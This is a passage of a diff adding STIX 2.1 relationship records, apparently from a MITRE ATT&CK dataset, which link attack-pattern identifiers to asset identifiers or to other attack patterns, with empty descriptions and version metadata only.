"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d9de58a6-58fd-499c-ba7d-588239297179", + "created": "2023-09-29T16:42:31.464Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:42:31.464Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d9e9c174-8874-4543-834c-6ed7822769ae", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d9ea2a3c-76ce-419b-899a-391eb7b19c9c", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d9fa7d68-a07c-4cf0-bb01-14e2c70c21d5", + "created": "2023-09-28T19:51:11.687Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:51:11.687Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--da0d2c02-a213-4815-a653-1e9b0a1b2841", + "created": "2020-01-24T15:43:25.420Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--52d40641-c480-4ad5-81a3-c80ccaddf82d", + "target_ref": "attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--da105995-d20e-468d-9e4d-9b715682c27f", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--da144dd2-c949-4a7f-8c8d-0cb27c52196a", + "created": "2023-09-29T16:42:53.226Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:42:53.226Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--da1b47d6-fb66-4dfc-95cc-65cf6caeb4a8", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--da25c0e6-1e1d-4789-bc52-1e5ea63470bd", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--da407f63-38cf-4247-b0bc-967ce74a2d78", + "created": "2020-01-24T15:15:13.616Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--da53b0a3-6b35-46af-b47c-f2e9f22ec683", + "created": "2020-02-05T16:23:01.845Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--6fb6408c-0db3-41d9-a3a1-a32e5f16454e", + "target_ref": "attack-pattern--31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--da694b30-bdba-42d9-af68-90f07ad9123d", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--da6f533c-2892-4613-930b-60152410990f", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--da771d72-c778-4c9a-acb4-01b5fc3d36c0", + "created": "2023-09-29T18:06:57.332Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:06:57.332Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--da794239-4728-42c6-a008-5a7487594ded", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--da7b027f-d6e7-4147-9355-3a826aaf850b", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--da8a0c7c-8bb2-4bc8-93db-f6f2ba2906f7", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--da987131-bf37-4730-9914-323879d2b5c3", + "created": "2023-09-28T20:34:11.025Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:34:11.025Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dac96d76-b9b8-4278-9f5b-62f4992e2ac8", + "created": "2023-09-28T19:44:22.801Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:44:22.801Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dae12737-664e-4b40-911a-2ad98a697d47", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--daf20029-ff08-40aa-bd8c-72ad317394a0", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dafe7999-8f3f-4ae5-84ae-8acc03683d17", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--db0eb16f-1c6a-422b-ab7c-70f931e2a36a", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--db2c0182-37ac-4a27-9131-b996d980a5d3", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--db2ddbcd-6ccd-4547-b8bf-0bdf8caa2e95", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--db36a604-2bce-4b2d-a9c5-dd926626c8b2", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--db46e84f-435e-4022-b484-e6d2e253660c", + "created": "2023-09-29T18:06:13.468Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:06:13.468Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--db6334a2-3e7d-442d-a32b-408710fa4d43", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dbafbd19-029c-4a90-989f-77e8fbd49107", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dbb11073-1daa-4bc9-91de-a4213791a220", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dbcaecae-78b4-4e51-943e-36d85cad4ffc", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dbcc492c-782e-4418-8373-dbc7a76498b0", + "created": "2023-09-29T17:45:35.293Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:45:35.293Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dbe030c8-342b-442a-9be5-615096c4489e", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dbeaf89f-5688-4d38-b338-646c11977445", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dc04d6ba-45b5-4635-8b2d-a41abcc7fdca", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dc1cc053-09f2-4dd1-9d80-7777f3f08d79", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dc2d7e1c-b3a0-4350-9025-736c82c96cde", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dc2d9148-906d-4408-a221-e44e235c4032", + "created": "2024-06-27T09:06:03.246Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": 